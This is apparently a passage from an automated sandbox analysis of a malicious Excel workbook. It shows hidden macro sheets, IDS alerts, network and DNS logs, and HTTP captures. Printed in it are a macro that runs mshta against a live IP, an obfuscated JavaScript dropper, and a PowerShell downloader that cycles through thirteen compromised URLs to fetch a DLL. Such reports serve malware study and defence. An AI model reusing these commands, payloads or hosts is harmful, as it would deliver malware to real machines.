                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                            General
                                            Stream Path:Workbook
                                            File Type:Applesoft BASIC program data, first line number 16
                                            Stream Size:81698
                                            Entropy:7.36680951422
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                            Name:LINKO
                                            Type:3
                                            Final:False
                                            Visible:False
                                            Protected:False
                                                              LINKO
                                                              3
                                                              False
                                                              0
                                                              False
                                                              post
                                                              2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html")4,2,=HALT()
                                                           
                                            Name:LINKO
                                            Type:3
                                            Final:False
                                            Visible:False
                                            Protected:False
                                                              LINKO
                                                              3
                                                              False
                                                              0
                                                              False
                                                              pre
                                                              2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html")4,2,=HALT()
                                                           
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/28/22-23:03:54.812490TCP2034631ET TROJAN Maldoc Activity (set)4916680192.168.2.2291.240.118.172
                                            01/28/22-23:03:55.007658TCP1201ATTACK-RESPONSES 403 Forbidden8049167213.186.33.4192.168.2.22
                                            01/28/22-23:03:59.136531ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 28, 2022 23:03:49.740837097 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.799501896 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.799621105 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.808324099 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.866976976 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868076086 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868109941 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868128061 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868144035 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868160963 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868175030 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.868177891 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868195057 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868211985 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868227959 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868232965 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.868238926 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.868242025 CET804916591.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:49.868297100 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.868305922 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:49.875055075 CET4916580192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:54.748336077 CET4916680192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:54.809679985 CET804916691.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:54.809772968 CET4916680192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:54.812489986 CET4916680192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:54.873754978 CET804916691.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:54.874752998 CET804916691.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:54.874784946 CET804916691.240.118.172192.168.2.22
                                            Jan 28, 2022 23:03:54.874865055 CET4916680192.168.2.2291.240.118.172
                                            Jan 28, 2022 23:03:54.952105999 CET4916780192.168.2.22213.186.33.4
                                            Jan 28, 2022 23:03:54.979172945 CET8049167213.186.33.4192.168.2.22
                                            Jan 28, 2022 23:03:54.979319096 CET4916780192.168.2.22213.186.33.4
                                            Jan 28, 2022 23:03:54.979449034 CET4916780192.168.2.22213.186.33.4
                                            Jan 28, 2022 23:03:55.007658005 CET8049167213.186.33.4192.168.2.22
                                            Jan 28, 2022 23:03:55.219068050 CET4916780192.168.2.22213.186.33.4
                                            Jan 28, 2022 23:03:57.186476946 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.205138922 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.205250978 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.205395937 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.223896980 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281140089 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281177044 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281189919 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281202078 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281214952 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281234026 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281250954 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281267881 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281285048 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281302929 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.281327963 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.281476021 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.281481028 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.299981117 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.300010920 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.300064087 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.300517082 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.300549984 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.300595045 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.301903009 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.301925898 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.301981926 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.303164005 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.303186893 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.303241014 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.304472923 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.304493904 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.304544926 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.305804014 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.305826902 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.305872917 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.307110071 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.307135105 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.307179928 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.308443069 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.308465958 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.308506012 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.309700966 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.309722900 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.309763908 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.311002016 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.311022997 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.311081886 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.318610907 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.318635941 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.318722963 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.319243908 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.319263935 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.319307089 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.320518017 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.320544004 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.320589066 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.321872950 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.321894884 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.321942091 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.323156118 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.323178053 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.323229074 CET4916880192.168.2.22217.160.0.155
                                            Jan 28, 2022 23:03:57.324465036 CET8049168217.160.0.155192.168.2.22
                                            Jan 28, 2022 23:03:57.324489117 CET8049168217.160.0.155192.168.2.22
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 28, 2022 23:03:54.923243046 CET5216753192.168.2.228.8.8.8
                                            Jan 28, 2022 23:03:54.942182064 CET53521678.8.8.8192.168.2.22
                                            Jan 28, 2022 23:03:55.111644030 CET5059153192.168.2.228.8.8.8
                                            Jan 28, 2022 23:03:56.124654055 CET5059153192.168.2.228.8.8.8
                                            Jan 28, 2022 23:03:57.138221025 CET5059153192.168.2.228.8.8.8
                                            Jan 28, 2022 23:03:57.156867981 CET53505918.8.8.8192.168.2.22
                                            Jan 28, 2022 23:03:57.166836977 CET5780553192.168.2.228.8.8.8
                                            Jan 28, 2022 23:03:57.185715914 CET53578058.8.8.8192.168.2.22
                                            Jan 28, 2022 23:03:59.136405945 CET53505918.8.8.8192.168.2.22
                                            Jan 28, 2022 23:03:59.292668104 CET53505918.8.8.8192.168.2.22
                                            TimestampSource IPDest IPChecksumCodeType
                                            Jan 28, 2022 23:03:59.136531115 CET192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 28, 2022 23:03:54.923243046 CET192.168.2.228.8.8.80xfc9aStandard query (0)weezual.frA (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:55.111644030 CET192.168.2.228.8.8.80x11bStandard query (0)mycloud.suplitecmo.comA (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:56.124654055 CET192.168.2.228.8.8.80x11bStandard query (0)mycloud.suplitecmo.comA (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:57.138221025 CET192.168.2.228.8.8.80x11bStandard query (0)mycloud.suplitecmo.comA (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:57.166836977 CET192.168.2.228.8.8.80x88eaStandard query (0)michaelcrompton.co.ukA (IP address)IN (0x0001)
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 28, 2022 23:03:54.942182064 CET8.8.8.8192.168.2.220xfc9aNo error (0)weezual.fr213.186.33.4A (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:57.156867981 CET8.8.8.8192.168.2.220x11bServer failure (2)mycloud.suplitecmo.comnonenoneA (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:57.185715914 CET8.8.8.8192.168.2.220x88eaNo error (0)michaelcrompton.co.uk217.160.0.155A (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:59.136405945 CET8.8.8.8192.168.2.220x11bServer failure (2)mycloud.suplitecmo.comnonenoneA (IP address)IN (0x0001)
                                            Jan 28, 2022 23:03:59.292668104 CET8.8.8.8192.168.2.220x11bServer failure (2)mycloud.suplitecmo.comnonenoneA (IP address)IN (0x0001)
                                            • 91.240.118.172
                                            • weezual.fr
                                            • michaelcrompton.co.uk
                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.224916591.240.118.17280C:\Windows\System32\mshta.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 28, 2022 23:03:49.808324099 CET0OUTGET /cc/vv/fe.html HTTP/1.1
                                            Accept: */*
                                            Accept-Language: en-US
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 91.240.118.172
                                            Connection: Keep-Alive
                                            Jan 28, 2022 23:03:49.868076086 CET2INHTTP/1.1 200 OK
                                            Server: nginx/1.20.2
                                            Date: Fri, 28 Jan 2022 22:03:49 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 32 62 34 34 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 69 38 48 77 69 34 66 35 76 36 68 61 6d 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 70 32 4e 36 31 54 36 33 34 63 47 30 76 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 70 32 4e 36 31 54 36 33 34 63 47 30 76 5b 30 5d 3d 27 67 25 37 37 25 33 35 6e 25 35 33 5c 31 37 32 25 33 32 25 37 36 27 20 20 20 3b 69 38 48 77 69 34 66 35 76 36 68 61 6d 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 76 7f 5c 5c 7f 31 7f 34 7f 31 7f 25 7f 37 7f 32 7f 25 7f 32 7f 30 7f 71 7d 1d 7f 39 7f 25 7f 33 7f 37 7d 26 7f 44 7d 20 7d 28 7f 32 7d 28 7f 33 7f 42 7d 1d 7f 31 7d 19 7f 37 7d 1c 7f 33 7f 38 7d 29 7f 53 7d 1d 7f 34 7d 06 7f 6e 7f 67 7d 20 7f 45 7d 19 7f 34 7f 36 7f 72 7f 6f 7f 6d 7f 43 7d 19 7f 35 7f 30 7f 61 7f 72 7f 43 7f 25 7f 36 7f 46 7d 41 7f 34 7f 65 7d 20 7d 37 7f 33 7d 35 7f 33 7d 20 7d 4d 7d 56 7d 26 7f 30 7d 20 7d 25 7d 2f 7f 66 7f 6f 7d 19 7f 36 7d 1f 7f 32 7d 37 7f 36 7d 5f 7d 2a 7f 33 7d 5d 7d 2f 7d 4e 7d 5f 7d 5a 7d 1f 7f 33 7f 34 7d 26 7d 2e 7d 2e 7f 42 7d 48 7d 1c 7f 32
                                            Data Ascii: 2b44<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';i8Hwi4f5v6ham=new Array();p2N61T634cG0v=new Array();p2N61T634cG0v[0]='g%77%35n%53\172%32%76' ;i8Hwi4f5v6ham[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'v\\141%72%20q}9%37}&D} }(2}(3B}1}7}38})S}4}ng} E}46romC}50arC%6F}A4e} }73}53} }M}V}&0} }%}/fo}6}2}76}_}*3}]}/}N}_}Z}34}&}.}.B}H}2


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.224916691.240.118.17280C:\Windows\System32\mshta.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 28, 2022 23:03:54.812489986 CET12OUTGET /cc/vv/fe.png HTTP/1.1
                                            Host: 91.240.118.172
                                            Connection: Keep-Alive
                                            Jan 28, 2022 23:03:54.874752998 CET14INHTTP/1.1 200 OK
                                            Server: nginx/1.20.2
                                            Date: Fri, 28 Jan 2022 22:03:54 GMT
                                            Content-Type: image/png
                                            Content-Length: 1341
                                            Connection: keep-alive
                                            Last-Modified: Fri, 28 Jan 2022 17:05:19 GMT
                                            ETag: "53d-5d6a77081f1c0"
                                            Accept-Ranges: bytes
                                            Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 77 65 65 7a 75 61 6c 2e 66 72 2f 6a 75 39 63 2f 74 77 45 48 4a 44 43 76 4e 77 47 69 6d 44 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 79 63 6c 6f 75 64 2e 73 75 70 6c 69 74 65 63 6d 6f 2e 63 6f 6d 2f 46 6f 78 2d 43 43 46 53 2f 7a 42 64 47 71 69 79 57 31 48 54 5a 44 32 6a 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 69 63 68 61 65 6c 63 72 6f 6d 70 74 6f 6e 2e 63 6f 2e 75 6b 2f 77 70 2d 61 64 6d 69 6e 2f 47 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 6e 67 61 6a 69 2e 73 68 6f 70 2f 77 70 2d 61 64 6d 69 6e 2f 7a 56 68 53 71 48 6f 37 46 69 32 75 6c 4e 65 4e 31 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6c 61 6d 62 61 79 65 71 75 65 2e 61 70 69 70 65 72 75 2e 6e 65 74 2e 70 65 2f 61 73 73 65 74 73 2f 77 68 6e 59 7a 44 42 4c 48 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 63 68 75 70 61 68 66 61 73 68 69 6f 6e 2e 63 6f 6d 2f 65 68 36 62 77 78 6b 2f 62 6f 77 70 74 6c 2f 46 32 73 69 62 39 30 7a 5a 73 71 4a 34 34 2f 62 51 38 56 58 53 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 68 65 6b 6d 61 74 32 30 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 37 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 73 65 70 2e 64 66 77 73 6f 6c 61 72 2e 63 6c 75 62 2f 68 7a 68 33 76 2f 7a 43 55 7a 34 34 56 67 49 72 4e 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 61 6e 63 79 68 2e 78 79 7a 2f 61 73 73 65 74 73 2f 50 63 78 76 31 6b 35 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 6e 61 68 6f 75 73 65 63 61 72 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6e 41 5a 56 31 66 35 42 68 39 43 46 6d 42 74 6c 32 4a 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 66 69 72 73 74 66 69 74 73 63 68 6f 6f 6c 2e 63 6f 6d 2f 38 33 77 67 36 7a 2f 39 54 52 49 6b 35 48 73 6f 54 51 69 69 56 57 6f 58 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 3a 2f 2f 73 74 61 6e 63 65 77 68 65 65 6c 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 62 62 4c 31 4d 41 7a 4e 76 6f 68 48 48 2f 27 3b 0d 0a 24 75 72 6c 31 33 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 6f 75 72 6e 65 79 70 72 6f 70 65 72 74 79 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 74 65 72 71 2f 46 6f 50 72 57 38 71 4b 7a 67 49 6a 33 45 38 6d 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 2c 24 75 72 6c 31 33 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c
                                            Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://weezual.fr/ju9c/twEHJDCvNwGimD/';$url2 = 'http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/';$url3 = 'http://michaelcrompton.co.uk/wp-admin/G/';$url4 = 'https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/';$url5 = 'https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/';$url6 = 'http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/';$url7 = 'https://hekmat20.com/wp-includes/7/';$url8 = 'http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/';$url9 = 'http://ancyh.xyz/assets/Pcxv1k5/';$url10 = 'http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/';$url11 = 'http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/';$url12 = 'http://stancewheels.com/wp-admin/bbL1MAzNvohHH/';$url13 = 'http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try { $web.Downl


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.2249167213.186.33.480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 28, 2022 23:03:54.979449034 CET15OUTGET /ju9c/twEHJDCvNwGimD/ HTTP/1.1
                                            Host: weezual.fr
                                            Connection: Keep-Alive
                                            Jan 28, 2022 23:03:55.007658005 CET15INHTTP/1.1 403 Forbidden
                                            date: Fri, 28 Jan 2022 22:03:54 GMT
                                            content-type: text/html; charset=iso-8859-1
